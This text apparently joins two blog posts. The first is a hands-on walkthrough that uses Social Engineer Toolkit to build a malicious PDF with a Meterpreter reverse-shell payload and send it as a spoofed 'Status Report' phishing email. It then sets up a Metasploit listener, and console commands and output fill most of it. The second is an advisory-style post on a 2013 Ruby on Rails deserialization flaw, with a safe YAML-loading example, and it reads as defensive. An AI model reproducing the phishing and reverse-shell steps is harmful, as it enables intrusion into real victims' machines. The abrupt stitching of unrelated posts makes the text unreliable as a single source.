7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

And now number two:

set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <-- Enter attacking IP address
set:payloads> Port to connect back on [443]: <-- Enter attacking listening port
[-] Defaulting to port 443...
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

We’ll keep the default filename by entering one.

Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

We’ll select one:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

And select one again:

Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?

We’ll go for option three:

Send email to: Enter target email address

I’m going to send this to one of my web based email accounts:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

I originally selected option one, but Gmail (and all my other web-based email providers) kept refusing the connection as the email had a potentially dangerous attachment, and so I was forced to use option two with my server-based email address.

set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails

At this point I checked my “target” email account and an email had duly arrived entitled “Status Report” and a PDF attachment, simply entitled “Template”.

Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.

I opened the PDF attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and in the process connect to the attacking machine.

Meanwhile, in the terminal I was asked:

set:phishing> Setup a listener [yes|no]:y

Which consequently activated Metasploit:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler...

It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.

Ruby on Rails Vulnerability: The Exploit and the Importance of Patching


Guest post:

If you’re running a Ruby on Rails version affected by CVE-2013-0156 but haven’t patched your server yet, what are you waiting for?

Nothing good lasts forever, and as it must to all good things, an attack has come to the framework of Ruby on Rails, one of the Internet’s more popular open-source Web development applications. The exploit first surfaced in January of 2013, and those who have not yet applied the available patches could be in for trouble.

By the time the first warnings appeared, developers had already introduced the earliest fixes, but a large number of users paid no attention. Many who failed to heed the call soon had reason to regret their inattention to this vital detail.

The Exploit’s Insidious Methods

An inherent vulnerability allows the Rails hacker to infiltrate crontab with a command that remotely downloads, compiles and executes a C source file that has the ability to carry out commands. As a safeguard against compilation failure, it also downloads a pre-compiled version of the same file. The malware then sets up an IRC bot that generates a nine-character, randomly determined nickname and uses it to connect to an IRC server. From this location, it enters the #rails channel and sits awaiting further instruction.

Once connected, the bot will follow the hacker’s every command. It will download and execute malicious files. At its worst, it may even switch the user’s server.

The Roots of the RoR Problem

Ruby on Rails makes extensive use of the JSON processor’s YAML deserialization format for reading the server’s configuration files. Its vulnerability to an arbitrary instantiation of a Ruby object allows the Rails hacker to bypass authentication and connect directly to the server. In addition, RoR’s automatic parameter-parsing capabilities permit the casting of data string values to other data types. Inherent in versions 3.0 and earlier, this flaw opens the door to any attacker intent on harming a Ruby on Rails application.

Once in, the hacker can execute poisonous code or even instigate an actual denial of service. He can also inject sinister SQL queries to extract sensitive information from a website’s database. By permitting the remote execution of system commands, the exploit allows any misguided individual to compromise the integrity of numerous websites with little difficulty.
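The mitigation for the arbitrary-object-instantiation problem described above, as an added Ruby example that is not part of the original article or of Rails itself: load configuration-style YAML from outside the trust boundary with Psych's safe_load, which refuses Ruby object tags and symbols instead of instantiating them. The three documents and the class name SomeAppClass are constructed.

```ruby
require 'yaml'

# Constructed: the kind of plain configuration document that should load.
PLAIN_CONFIG_YAML = <<~YAML
  database:
    adapter: postgresql
    pool: 5
  hosts:
    - app1.example.internal
    - app2.example.internal
YAML

# Constructed: a document carrying a Ruby object tag, the shape of input the
# arbitrary instantiation described above relies on. SomeAppClass is a
# placeholder; safe_load refuses it before any class is even looked up.
TAGGED_YAML = <<~YAML
  --- !ruby/object:SomeAppClass
  name: anything
YAML

# Constructed: a symbol scalar, which safe_load also refuses by default.
SYMBOL_YAML = "role: :admin\n"

# Load untrusted YAML. safe_load permits only the basic YAML types (strings,
# numbers, booleans, nil, arrays, hashes) unless classes are explicitly
# permitted, so a tag asking for an arbitrary Ruby class is reported and
# rejected rather than instantiated as older YAML.load would do.
def load_untrusted_yaml(text)
  [:ok, YAML.safe_load(text)]
rescue Psych::DisallowedClass => e
  [:rejected, e.message]
rescue Psych::SyntaxError => e
  [:invalid, e.message]
end

if __FILE__ == $PROGRAM_NAME
  p load_untrusted_yaml(TAGGED_YAML)
end
```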

The Risks for Users Who Fail to Patch

Although the readily available patches present an easy solution to the problem, many have failed to make use of them. This is due in part to RoR’s excellent track record on security. Most of its users are not professional developers and may be unaware of the need to keep abreast of recommended updates. Many become so comfortable with the version they are currently using that they resist making changes of any kind. Others fear that the installation of such updates might actually upset an otherwise well-balanced apple cart.

When it comes to ignoring security patches, however, this very complacency can leave a website wide open to a serious malware infestation. The end result: a rampant exploitation that wreaks malevolent havoc on numerous developers and web hosts.

What the User Can Do

To protect against such malicious attacks, it is vital for any Ruby on Rails developer to remain aware of and apply all updates and patches as soon as they appear. Experts also advise checking to ensure that systems can be rebuilt without the need of access to such things as Github and Rubygems. The up-to-date user should be sure to:

- Take proactive steps to maximize security.
- Minimize the use of tech stacks, keeping abreast of security updates for each.
- Maintain an updated list of all applications.
- Take all recommended security measures.

Fortunately, where Ruby on Rails is concerned, the white hats appear to outnumber the black hats, and the good guys are constantly at work in securing and strengthening the application while taking pains to keep users informed of new developments and patches. All that must happen now is for users to pay attention to what they’re saying and, most importantly, to take their advice.


About the Author
This article was written by James Younger, a security Subject Matter Expert from Advanced Security by TrainACE. Advanced Security is a training company that provides classes in cutting edge areas of Cyber Security including Exploit Development, Python for Security and Ruby on Rails.
